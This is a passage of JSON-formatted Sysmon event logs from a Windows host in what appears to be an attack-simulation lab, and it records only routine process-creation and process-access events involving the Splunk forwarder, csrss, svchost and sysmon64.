07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3787,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.598\r\nProcessGuid: {41C8662E-1FFC-5F25-0000-0010F4CB0500}\r\nProcessId: 892\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.598","ProcessGuid":"{41C8662E-1FFC-5F25-0000-0010F4CB0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3788,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FFC-5F25-0000-0010F4CB0500}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FFC-5F25-0000-0010F4CB0500}","TargetProcessId":"892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3789,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FFC-5F25-0000-0010F4CB0500}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FFC-5F25-0000-0010F4CB0500}","TargetProcessId":"892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3790,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3791,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3792,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3793,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3794,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:40.597","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3795,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:40.597\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 